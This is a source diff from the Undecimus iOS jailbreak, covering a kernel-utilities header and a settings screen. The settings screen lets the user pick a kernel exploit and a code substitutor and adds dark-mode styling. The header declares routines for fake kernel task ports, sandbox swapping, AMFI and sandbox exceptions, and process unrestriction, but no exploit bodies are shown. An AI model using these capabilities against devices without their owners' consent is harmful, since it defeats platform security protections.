 int chgproccnt(uid_t uid, int diff);
 kptr_t vfs_context_current(void);
 int vnode_lookup(const char *path, int flags, kptr_t *vpp, kptr_t ctx);
+int vnode_getfromfd(kptr_t ctx, int fd, kptr_t *vpp);
+int vn_getpath(kptr_t vp, char *pathbuf, int *len);
 int vnode_put(kptr_t vp);
-BOOL OSDictionary_SetItem(kptr_t OSDictionary, const char *key, kptr_t val);
+bool OSDictionary_SetItem(kptr_t OSDictionary, const char *key, kptr_t val);
 kptr_t OSDictionary_GetItem(kptr_t OSDictionary, const char *key);
-BOOL OSDictionary_Merge(kptr_t OSDictionary, kptr_t OSDictionary2);
+bool OSDictionary_Merge(kptr_t OSDictionary, kptr_t OSDictionary2);
 uint32_t OSDictionary_ItemCount(kptr_t OSDictionary);
 kptr_t OSDictionary_ItemBuffer(kptr_t OSDictionary);
 kptr_t OSDictionary_ItemKey(kptr_t buffer, uint32_t idx);
 kptr_t OSDictionary_ItemValue(kptr_t buffer, uint32_t idx);
 uint32_t OSArray_ItemCount(kptr_t OSArray);
-BOOL OSArray_Merge(kptr_t OSArray, kptr_t OSArray2);
+bool OSArray_Merge(kptr_t OSArray, kptr_t OSArray2);
 kptr_t OSArray_GetObject(kptr_t OSArray, uint32_t idx);
 void OSArray_RemoveObject(kptr_t OSArray, uint32_t idx);
 kptr_t OSArray_ItemBuffer(kptr_t OSArray);
@@ -135,33 +140,42 @@ uint32_t OSString_GetLength(kptr_t OSString);
 kptr_t OSString_CStringPtr(kptr_t OSString);
 char *OSString_CopyString(kptr_t OSString);
 kptr_t OSUnserializeXML(const char *buffer);
-kptr_t get_exception_osarray(const char **exceptions);
+kptr_t get_exception_osarray(const char **exceptions, bool is_file_extension);
 char **copy_amfi_entitlements(kptr_t present);
-kptr_t getOSBool(BOOL value);
-BOOL entitle_process(kptr_t amfi_entitlements, const char *key, kptr_t val);
-BOOL set_sandbox_exceptions(kptr_t sandbox, const char **exceptions);
-BOOL check_for_exception(char **current_exceptions, const char *exception);
-BOOL set_amfi_exceptions(kptr_t amfi_entitlements, const char **exceptions);
-BOOL set_exceptions(kptr_t sandbox, kptr_t amfi_entitlements);
+kptr_t getOSBool(bool value);
+bool entitle_process(kptr_t amfi_entitlements, const char *key, kptr_t val);
+bool set_sandbox_exceptions(kptr_t sandbox);
+bool check_for_exception(char **current_exceptions, const char *exception);
+bool set_amfi_exceptions(kptr_t amfi_entitlements, const char *exc_key, const char **exceptions, bool is_file_extension);
+bool set_exceptions(kptr_t sandbox, kptr_t amfi_entitlements);
 kptr_t get_amfi_entitlements(kptr_t cr_label);
 kptr_t get_sandbox(kptr_t cr_label);
-BOOL entitle_process_with_pid(pid_t pid, const char *key, kptr_t val);
-BOOL remove_memory_limit(void);
-BOOL restore_kernel_task_port(task_t *out_kernel_task_port);
-BOOL restore_kernel_base(uint64_t *out_kernel_base, uint64_t *out_kernel_slide);
-BOOL restore_kernel_offset_cache(void);
-BOOL restore_file_offset_cache(const char *offset_cache_file_path, kptr_t *out_kernel_base, uint64_t *out_kernel_slide);
-BOOL convert_port_to_task_port(mach_port_t port, kptr_t space, kptr_t task_kaddr);
+bool entitle_process_with_pid(pid_t pid, const char *key, kptr_t val);
+bool remove_memory_limit(void);
+bool restore_kernel_task_port(task_t *out_kernel_task_port);
+bool restore_kernel_base(uint64_t *out_kernel_base, uint64_t *out_kernel_slide);
+bool restore_kernel_offset_cache(void);
+bool restore_file_offset_cache(const char *offset_cache_file_path, kptr_t *out_kernel_base, uint64_t *out_kernel_slide);
+bool convert_port_to_task_port(mach_port_t port, kptr_t space, kptr_t task_kaddr);
 kptr_t make_fake_task(kptr_t vm_map);
-BOOL make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr);
-BOOL set_hsp4(task_t port);
+bool make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr);
+bool set_hsp4(task_t port);
 kptr_t get_vnode_for_path(const char *path);
+kptr_t get_vnode_for_fd(int fd);
+char *get_path_for_fd(int fd);
 kptr_t get_vnode_for_snapshot(int fd, char *name);
-BOOL set_kernel_task_info(void);
+bool set_kernel_task_info(void);
 int issue_extension_for_mach_service(kptr_t sb, kptr_t ctx, const char *entry_name, void *desc);
-BOOL unrestrict_process(pid_t pid);
-BOOL unrestrict_process_with_task_port(task_t task_port);
-BOOL revalidate_process(pid_t pid);
-BOOL revalidate_process_with_task_port(task_t task_port);
+bool unrestrict_process(pid_t pid);
+bool unrestrict_process_with_task_port(task_t task_port);
+bool unrestrict_library(const char *path);
+bool unrestrict_library_with_fd(int fd);
+bool revalidate_process(pid_t pid);
+bool revalidate_process_with_task_port(task_t task_port);
+bool enable_mapping_for_library(const char *lib);
+bool enable_mapping_for_libraries(const char *libs);
+kptr_t find_vnode_with_fd(kptr_t proc, int fd);
+kptr_t find_vnode_with_path(const char *path);
+kptr_t swap_sandbox_for_proc(kptr_t proc, kptr_t sandbox);
 
 #endif /* kutils_h */

Undecimus/source/SettingsTableViewController.h

@@ -10,35 +10,92 @@
 #import "common.h"
 #import "utils.h"
 
-@interface SettingsTableViewController : UITableViewController <UITextFieldDelegate>
-@property (weak, nonatomic) IBOutlet UISwitch *TweakInjectionSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *LoadDaemonsSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *DumpAPTicketSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *RefreshIconCacheSwitch;
-@property (weak, nonatomic) IBOutlet UITextField *BootNonceTextField;
-@property (weak, nonatomic) IBOutlet UISegmentedControl *KernelExploitSegmentedControl;
+@interface SettingsTableViewController : UITableViewController  <UITextFieldDelegate, UIPickerViewDataSource, UIPickerViewDelegate>
+@property (weak, nonatomic) IBOutlet UISwitch *tweakInjectionSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *loadDaemonsSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *dumpAPTicketSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *refreshIconCacheSwitch;
+@property (weak, nonatomic) IBOutlet UITextField *bootNonceTextField;
+@property (weak, nonatomic) IBOutlet UITextField *kernelExploitTextField;
+@property (nonatomic) UIPickerView *kernelExploitPickerView;
+@property (nonatomic) NSMutableArray *exploitPickerArray;
+@property (nonatomic) NSMutableDictionary *availableExploits;
+@property (nonatomic) UIToolbar *exploitPickerToolbar;
+@property (weak, nonatomic) IBOutlet UITextField *codeSubstitutorTextField;
+@property (nonatomic) UIPickerView *codeSubstitutorPickerView;
+@property (nonatomic) NSMutableArray *substitutorPickerArray;
+@property (nonatomic) NSMutableDictionary *availableSubstitutors;
+@property (nonatomic) UIToolbar *substitutorPickerToolbar;
+@property (nonatomic) BOOL isPicking;
 @property (weak, nonatomic) IBOutlet UIButton *restartButton;
-@property (weak, nonatomic) IBOutlet UISwitch *DisableAutoUpdatesSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *DisableAppRevokesSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *disableAutoUpdatesSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *disableAppRevokesSwitch;
 @property (nonatomic) UITapGestureRecognizer *tap;
-@property (weak, nonatomic) IBOutlet UIButton *ShareDiagnosticsDataButton;
-@property (weak, nonatomic) IBOutlet UIButton *OpenCydiaButton;
-@property (weak, nonatomic) IBOutlet UITextField *ExpiryLabel;
-@property (weak, nonatomic) IBOutlet UISwitch *OverwriteBootNonceSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *ExportKernelTaskPortSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *RestoreRootFSSwitch;
+@property (weak, nonatomic) IBOutlet UIButton *shareDiagnosticsDataButton;
+@property (weak, nonatomic) IBOutlet UIButton *openCydiaButton;
+@property (weak, nonatomic) IBOutlet UITextField *expiryLabel;
+@property (weak, nonatomic) IBOutlet UISwitch *overwriteBootNonceSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *exportKernelTaskPortSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *restoreRootFSSwitch;
 @property (weak, nonatomic) IBOutlet UISwitch *installCydiaSwitch;
 @property (weak, nonatomic) IBOutlet UISwitch *installSSHSwitch;
-@property (weak, nonatomic) IBOutlet UITextField *UptimeLabel;
-@property (weak, nonatomic) IBOutlet UISwitch *IncreaseMemoryLimitSwitch;
-@property (weak, nonatomic) IBOutlet UITextField *ECIDLabel;
-@property (weak, nonatomic) IBOutlet UISwitch *ReloadSystemDaemonsSwitch;
-@property (weak, nonatomic) IBOutlet UIButton *RestartSpringBoardButton;
-@property (weak, nonatomic) IBOutlet UISwitch *HideLogWindowSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *ResetCydiaCacheSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *SSHOnlySwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *EnableGetTaskAllowSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *SetCSDebuggedSwitch;
+@property (weak, nonatomic) IBOutlet UITextField *uptimeLabel;
+@property (weak, nonatomic) IBOutlet UISwitch *increaseMemoryLimitSwitch;
+@property (weak, nonatomic) IBOutlet UITextField *ecidLabel;
+@property (weak, nonatomic) IBOutlet UISwitch *reloadSystemDaemonsSwitch;
+@property (weak, nonatomic) IBOutlet UIButton *restartSpringBoardButton;
+@property (weak, nonatomic) IBOutlet UISwitch *hideLogWindowSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *resetCydiaCacheSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *sshOnlySwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *enableGetTaskAllowSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *setCSDebuggedSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *autoRespringSwitch;
+
+@property (weak, nonatomic) IBOutlet UILabel *specialThanksLabel;
+@property (weak, nonatomic) IBOutlet UILabel *tweakInjectionLabel;
+@property (weak, nonatomic) IBOutlet UILabel *loadDaemonsLabel;
+@property (weak, nonatomic) IBOutlet UILabel *dumpAPTicketLabel;
+@property (weak, nonatomic) IBOutlet UILabel *refreshIconCacheLabel;
+@property (weak, nonatomic) IBOutlet UILabel *disableAutoUpdatesLabel;
+@property (weak, nonatomic) IBOutlet UILabel *disableAppRevokesLabel;
+@property (weak, nonatomic) IBOutlet UILabel *overwriteBootNonceLabel;
+@property (weak, nonatomic) IBOutlet UILabel *exportKernelTaskPortLabel;
+@property (weak, nonatomic) IBOutlet UILabel *restoreRootFSLabel;
+@property (weak, nonatomic) IBOutlet UILabel *installCydiaLabel;
+@property (weak, nonatomic) IBOutlet UILabel *installSSHLabel;
+@property (weak, nonatomic) IBOutlet UILabel *increaseMemoryLimitLabel;
+@property (weak, nonatomic) IBOutlet UILabel *reloadSystemDaemonsLabel;
+@property (weak, nonatomic) IBOutlet UILabel *hideLogWindowLabel;
+@property (weak, nonatomic) IBOutlet UILabel *resetCydiaCacheLabel;
+@property (weak, nonatomic) IBOutlet UILabel *sshOnlyLabel;
+@property (weak, nonatomic) IBOutlet UILabel *enableGetTaskAllowLabel;
+@property (weak, nonatomic) IBOutlet UILabel *setCSDebuggedLabel;
+@property (weak, nonatomic) IBOutlet UILabel *autoRespringLabel;
+@property (weak, nonatomic) IBOutlet UILabel *kernelExploitLabel;
+@property (weak, nonatomic) IBOutlet UILabel *codeSubstitutorLabel;
+@property (weak, nonatomic) IBOutlet UIButton *bootNonceButton;
+@property (weak, nonatomic) IBOutlet UIButton *ecidDarkModeButton;
+@property (weak, nonatomic) IBOutlet UILabel *expiryDarkModeLabel;
+@property (weak, nonatomic) IBOutlet UILabel *upTimeLabel;
+@property (weak, nonatomic) IBOutlet UIButton *loadTweaksInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *loadDaemonsInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *dumpAPTicketInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *refreshIconCacheInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *disableAutoUpdatesInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *disableAppRevokesInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *overwriteBootNonceInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *exportKernelTaskPortInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *restoreRootFSInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *increaseMemoryLimitInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *installSSHInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *installCydiaInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *reloadSystemDaemonsInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *hideLogWindowInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *resetCydiaSwitchInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *sshOnlyInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *enableGetTaskAllowInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *setCSDebuggedInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *autoRespringInfoButton;
 
 + (NSDictionary *)provisioningProfileAtPath:(NSString *)path;
 

Undecimus/source/SettingsTableViewController.m

@@ -29,12 +29,12 @@
 // https://github.com/Matchstic/ReProvision/blob/7b595c699335940f68702bb204c5aa55b8b1896f/Shared/Application%20Database/RPVApplication.m#L102
 
 + (NSDictionary *)provisioningProfileAtPath:(NSString *)path {
-    auto stringContent = [NSString stringWithContentsOfFile:path encoding:NSASCIIStringEncoding error:nil];
+    NSString *stringContent = [NSString stringWithContentsOfFile:path encoding:NSASCIIStringEncoding error:nil];
     stringContent = [stringContent componentsSeparatedByString:@"<plist version=\"1.0\">"][1];
     stringContent = [NSString stringWithFormat:@"%@%@", @"<plist version=\"1.0\">", stringContent];
     stringContent = [stringContent componentsSeparatedByString:@"</plist>"][0];
     stringContent = [NSString stringWithFormat:@"%@%@", stringContent, @"</plist>"];
-    auto const stringData = [stringContent dataUsingEncoding:NSASCIIStringEncoding];
+    NSData *const stringData = [stringContent dataUsingEncoding:NSASCIIStringEncoding];
     id const plist = [NSPropertyListSerialization propertyListWithData:stringData options:NSPropertyListImmutable format:nil error:nil];
     return plist;
 }
@@ -46,24 +46,158 @@
 
 - (void)viewDidLoad {
     [super viewDidLoad];
-    auto const myImageView = [[UIImageView alloc] initWithImage:[UIImage imageNamed:@"Clouds"]];
-    [myImageView setContentMode:UIViewContentModeScaleAspectFill];
-    [myImageView setFrame:self.tableView.frame];
-    auto const myView = [[UIView alloc] initWithFrame:myImageView.frame];
-    [myView setBackgroundColor:[UIColor whiteColor]];
-    [myView setAlpha:0.84];
-    [myView setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
-    [myImageView addSubview:myView];
-    [self.tableView setBackgroundView:myImageView];
-    [self.BootNonceTextField setDelegate:self];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(darkModeSettings:) name:@"darkModeSettings" object:nil];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(lightModeSettings:) name:@"lightModeSettings" object:nil];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(dismissKeyboardFromDoneButton:) name:@"dismissKeyboard" object:nil];
+    [self.bootNonceTextField setDelegate:self];
+    [self.bootNonceTextField setAutocorrectionType:UITextAutocorrectionTypeNo];
+    [self.kernelExploitTextField setDelegate:self];
     self.tap = [[UITapGestureRecognizer alloc] initWithTarget:self action:@selector(userTappedAnyware:)];
     self.tap.cancelsTouchesInView = NO;
     [self.view addGestureRecognizer:self.tap];
+    self.exploitPickerArray = [NSMutableArray new];
+    self.availableExploits = [NSMutableDictionary new];
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != jailbreak_capability) {
+            continue;
+        }
+        [_exploitPickerArray addObject:@(exploit_infos[i]->name)];
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        [_availableExploits addEntriesFromDictionary:@{@(exploit_infos[i]->name) : @(exploit_infos[i]->exploit)}];
+    }
+    self.substitutorPickerArray = [NSMutableArray new];
+    self.availableSubstitutors = [NSMutableDictionary new];
+    for (size_t i = 0; substitutor_infos[i]; i++) {
+        [_substitutorPickerArray addObject:@(substitutor_infos[i]->name)];
+        if (!checkDeviceSupport(substitutor_infos[i]->device_support_info)) {
+            continue;
+        }
+        [_availableSubstitutors addEntriesFromDictionary:@{@(substitutor_infos[i]->name) : @(substitutor_infos[i]->substitutor)}];
+    }
+    self.kernelExploitPickerView = [[UIPickerView alloc] init];
+    [self.kernelExploitPickerView setDataSource:self];
+    [self.kernelExploitPickerView setDelegate:self];
+    self.codeSubstitutorPickerView = [[UIPickerView alloc] init];
+    [self.codeSubstitutorPickerView setDataSource:self];
+    [self.codeSubstitutorPickerView setDelegate:self];
+    [self.kernelExploitTextField setInputView:_kernelExploitPickerView];
+    [self.codeSubstitutorTextField setInputView:_codeSubstitutorPickerView];
+    self.exploitPickerToolbar = [[UIToolbar alloc] initWithFrame:CGRectMake(0, 0, 320, 56)];
+    [self.exploitPickerToolbar setBarStyle:UIBarStyleDefault];
+    [self.exploitPickerToolbar sizeToFit];
+    self.substitutorPickerToolbar = [[UIToolbar alloc] initWithFrame:CGRectMake(0, 0, 320, 56)];
+    [self.substitutorPickerToolbar setBarStyle:UIBarStyleDefault];
+    [self.substitutorPickerToolbar sizeToFit];
+    UIBarButtonItem *exploitPickerAlignRight = [[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemFlexibleSpace target:self action:nil];
+    UIBarButtonItem *exploitPickerDoneButtonItem = [[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemDone target:self action:@selector(exploitPickerDoneAction)];
+    [self.exploitPickerToolbar setItems:[NSArray arrayWithObjects:exploitPickerAlignRight, exploitPickerDoneButtonItem, nil] animated:NO];
+    [self.kernelExploitTextField setInputAccessoryView:_exploitPickerToolbar];
+    UIBarButtonItem *substitutorPickerAlignRight = [[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemFlexibleSpace target:self action:nil];
+    UIBarButtonItem *substitutorPickerDoneButtonItem = [[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemDone target:self action:@selector(substitutorPickerDoneAction)];
+    [self.substitutorPickerToolbar setItems:[NSArray arrayWithObjects:substitutorPickerAlignRight, substitutorPickerDoneButtonItem, nil] animated:NO];
+    [self.codeSubstitutorTextField setInputAccessoryView:_substitutorPickerToolbar];
+    self.isPicking = NO;
+}
+
+-(void)dismissKeyboardFromDoneButton:(NSNotification *) notification {
+    [self.view endEditing:YES];
+}
+
+-(void)darkModeSettings:(NSNotification *) notification  {
+    [self.specialThanksLabel setTextColor:[UIColor whiteColor]];
+    [self.tweakInjectionLabel setTextColor:[UIColor whiteColor]];
+    [self.loadDaemonsLabel setTextColor:[UIColor whiteColor]];
+    [self.dumpAPTicketLabel setTextColor:[UIColor whiteColor]];
+    [self.refreshIconCacheLabel setTextColor:[UIColor whiteColor]];
+    [self.disableAutoUpdatesLabel setTextColor:[UIColor whiteColor]];
+    [self.disableAppRevokesLabel setTextColor:[UIColor whiteColor]];
+    [self.overwriteBootNonceLabel setTextColor:[UIColor whiteColor]];
+    [self.exportKernelTaskPortLabel setTextColor:[UIColor whiteColor]];
+    [self.restoreRootFSLabel setTextColor:[UIColor whiteColor]];
+    [self.installCydiaLabel setTextColor:[UIColor whiteColor]];
+    [self.installSSHLabel setTextColor:[UIColor whiteColor]];
+    [self.increaseMemoryLimitLabel setTextColor:[UIColor whiteColor]];
+    [self.reloadSystemDaemonsLabel setTextColor:[UIColor whiteColor]];
+    [self.hideLogWindowLabel setTextColor:[UIColor whiteColor]];
+    [self.resetCydiaCacheLabel setTextColor:[UIColor whiteColor]];
+    [self.sshOnlyLabel setTextColor:[UIColor whiteColor]];
+    [self.enableGetTaskAllowLabel setTextColor:[UIColor whiteColor]];
+    [self.setCSDebuggedLabel setTextColor:[UIColor whiteColor]];
+    [self.autoRespringLabel setTextColor:[UIColor whiteColor]];
+    [self.kernelExploitLabel setTextColor:[UIColor whiteColor]];
+    [self.codeSubstitutorLabel setTextColor:[UIColor whiteColor]];
+    [self.bootNonceButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.bootNonceTextField setTintColor:[UIColor whiteColor]];
+    [self.bootNonceTextField setTextColor:[UIColor whiteColor]];
+    [self.kernelExploitTextField setTintColor:[UIColor whiteColor]];
+    [self.codeSubstitutorTextField setTintColor:[UIColor whiteColor]];
+    [self.bootNonceTextField setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.kernelExploitTextField setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.codeSubstitutorTextField setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.ecidLabel setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.ecidDarkModeButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.expiryDarkModeLabel setTextColor:[UIColor whiteColor]];
+    [self.expiryLabel setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.uptimeLabel setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.upTimeLabel setTextColor:[UIColor whiteColor]];
+    [self.exploitPickerToolbar setBarTintColor:[UIColor darkTextColor]];
+    [self.substitutorPickerToolbar setBarTintColor:[UIColor darkTextColor]];
+    [self.kernelExploitPickerView setBackgroundColor:[UIColor blackColor]];
+    [self.codeSubstitutorPickerView setBackgroundColor:[UIColor blackColor]];
+    [JailbreakViewController.sharedController.navigationController.navigationBar setLargeTitleTextAttributes:@{ NSForegroundColorAttributeName : [UIColor whiteColor] }];
+}
+
+-(void)lightModeSettings:(NSNotification *) notification  {
+    [self.specialThanksLabel setTextColor:[UIColor blackColor]];
+    [self.tweakInjectionLabel setTextColor:[UIColor blackColor]];
+    [self.loadDaemonsLabel setTextColor:[UIColor blackColor]];
+    [self.dumpAPTicketLabel setTextColor:[UIColor blackColor]];
+    [self.refreshIconCacheLabel setTextColor:[UIColor blackColor]];
+    [self.disableAutoUpdatesLabel setTextColor:[UIColor blackColor]];
+    [self.disableAppRevokesLabel setTextColor:[UIColor blackColor]];
+    [self.overwriteBootNonceLabel setTextColor:[UIColor blackColor]];
+    [self.exportKernelTaskPortLabel setTextColor:[UIColor blackColor]];
+    [self.restoreRootFSLabel setTextColor:[UIColor blackColor]];
+    [self.installCydiaLabel setTextColor:[UIColor blackColor]];
+    [self.installSSHLabel setTextColor:[UIColor blackColor]];
+    [self.increaseMemoryLimitLabel setTextColor:[UIColor blackColor]];
+    [self.reloadSystemDaemonsLabel setTextColor:[UIColor blackColor]];
+    [self.hideLogWindowLabel setTextColor:[UIColor blackColor]];
+    [self.resetCydiaCacheLabel setTextColor:[UIColor blackColor]];
+    [self.sshOnlyLabel setTextColor:[UIColor blackColor]];
+    [self.enableGetTaskAllowLabel setTextColor:[UIColor blackColor]];
+    [self.setCSDebuggedLabel setTextColor:[UIColor blackColor]];
+    [self.autoRespringLabel setTextColor:[UIColor blackColor]];
+    [self.kernelExploitLabel setTextColor:[UIColor blackColor]];
+    [self.codeSubstitutorLabel setTextColor:[UIColor blackColor]];
+    [self.bootNonceButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.bootNonceTextField setTintColor:[UIColor blackColor]];
+    [self.bootNonceTextField setTextColor:[UIColor blackColor]];
+    [self.kernelExploitTextField setTintColor:[UIColor blackColor]];
+    [self.codeSubstitutorTextField setTintColor:[UIColor blackColor]];
+    [self.bootNonceTextField setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.kernelExploitTextField setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.codeSubstitutorTextField setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.ecidLabel setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.ecidDarkModeButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.expiryDarkModeLabel setTextColor:[UIColor blackColor]];
+    [self.expiryLabel setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.uptimeLabel setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.upTimeLabel setTextColor:[UIColor blackColor]];
+    [self.exploitPickerToolbar setBarTintColor:[UIColor lightTextColor]];
+    [self.substitutorPickerToolbar setBarTintColor:[UIColor lightTextColor]];
+    [self.kernelExploitPickerView setBackgroundColor:[UIColor whiteColor]];
+    [self.codeSubstitutorPickerView setBackgroundColor:[UIColor whiteColor]];
+    [JailbreakViewController.sharedController.navigationController.navigationBar setLargeTitleTextAttributes:@{ NSForegroundColorAttributeName : [UIColor blackColor] }];
 }
 
 - (void)userTappedAnyware:(UITapGestureRecognizer *) sender
 {
-    [self.view endEditing:YES];
+    if (!self.isPicking){
+        [self.view endEditing:YES];
+    }
 }
 
 - (BOOL)textFieldShouldReturn:(UITextField *)textField {
@@ -72,112 +206,192 @@
 }
 
 - (void)reloadData {
-    auto prefs = copy_prefs();
-    [self.TweakInjectionSwitch setOn:(BOOL)prefs->load_tweaks];
-    [self.LoadDaemonsSwitch setOn:(BOOL)prefs->load_daemons];
-    [self.DumpAPTicketSwitch setOn:(BOOL)prefs->dump_apticket];
-    [self.BootNonceTextField setPlaceholder:@(prefs->boot_nonce)];
-    [self.BootNonceTextField setText:nil];
-    [self.RefreshIconCacheSwitch setOn:(BOOL)prefs->run_uicache];
-    [self.KernelExploitSegmentedControl setSelectedSegmentIndex:(int)prefs->exploit];
-    [self.DisableAutoUpdatesSwitch setOn:(BOOL)prefs->disable_auto_updates];
-    [self.DisableAppRevokesSwitch setOn:(BOOL)prefs->disable_app_revokes];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(empty_list_exploit) forSegmentAtIndex:empty_list_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(multi_path_exploit) forSegmentAtIndex:multi_path_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(async_wake_exploit) forSegmentAtIndex:async_wake_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(voucher_swap_exploit) forSegmentAtIndex:voucher_swap_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(mach_swap_exploit) forSegmentAtIndex:mach_swap_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(mach_swap_2_exploit) forSegmentAtIndex:mach_swap_2_exploit];
-    [self.OpenCydiaButton setEnabled:[[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"cydia://"]]];
-    [self.ExpiryLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)[[SettingsTableViewController provisioningProfileAtPath:[[NSBundle mainBundle] pathForResource:@"embedded" ofType:@"mobileprovision"]][@"ExpirationDate"] timeIntervalSinceDate:[NSDate date]] / 86400, localize(@"Days")]];
-    [self.OverwriteBootNonceSwitch setOn:(BOOL)prefs->overwrite_boot_nonce];
-    [self.ExportKernelTaskPortSwitch setOn:(BOOL)prefs->export_kernel_task_port];
-    [self.RestoreRootFSSwitch setOn:(BOOL)prefs->restore_rootfs];
-    [self.UptimeLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)getUptime() / 86400, localize(@"Days")]];
-    [self.IncreaseMemoryLimitSwitch setOn:(BOOL)prefs->increase_memory_limit];
+    prefs_t *prefs = copy_prefs();
+    [self.tweakInjectionSwitch setOn:(BOOL)prefs->load_tweaks];
+    [self.loadDaemonsSwitch setOn:(BOOL)prefs->load_daemons];
+    [self.dumpAPTicketSwitch setOn:(BOOL)prefs->dump_apticket];
+    [self.bootNonceTextField setPlaceholder:@(prefs->boot_nonce)];
+    [self.bootNonceTextField setText:nil];
+    [self.refreshIconCacheSwitch setOn:(BOOL)prefs->run_uicache];
+    [self.disableAutoUpdatesSwitch setOn:(BOOL)prefs->disable_auto_updates];
+    [self.disableAppRevokesSwitch setOn:(BOOL)prefs->disable_app_revokes];
+    [self.kernelExploitTextField setText:nil];
+    @try {
+        [self.kernelExploitTextField setPlaceholder:[_exploitPickerArray objectAtIndex:(int)prefs->exploit]];
+    } @catch (__unused NSException *exception) {
+        [self.kernelExploitTextField setPlaceholder:localize(@"Unavailable")];
+        [self.kernelExploitTextField setEnabled:NO];
+    }
+    [self.codeSubstitutorTextField setText:nil];
+    @try {
+        [self.codeSubstitutorTextField setPlaceholder:[_substitutorPickerArray objectAtIndex:(int)prefs->code_substitutor]];
+    } @catch (__unused NSException *exception) {
+        [self.codeSubstitutorTextField setPlaceholder:localize(@"Unavailable")];
+        [self.codeSubstitutorTextField setEnabled:NO];
+    }
+    [self.openCydiaButton setEnabled:(BOOL)cydiaIsInstalled()];
+    [self.expiryLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)[[SettingsTableViewController provisioningProfileAtPath:[[NSBundle mainBundle] pathForResource:@"embedded" ofType:@"mobileprovision"]][@"ExpirationDate"] timeIntervalSinceDate:[NSDate date]] / 86400, localize(@"Days")]];
+    [self.overwriteBootNonceSwitch setOn:(BOOL)prefs->overwrite_boot_nonce];
+    [self.exportKernelTaskPortSwitch setOn:(BOOL)prefs->export_kernel_task_port];
+    [self.restoreRootFSSwitch setOn:(BOOL)prefs->restore_rootfs];
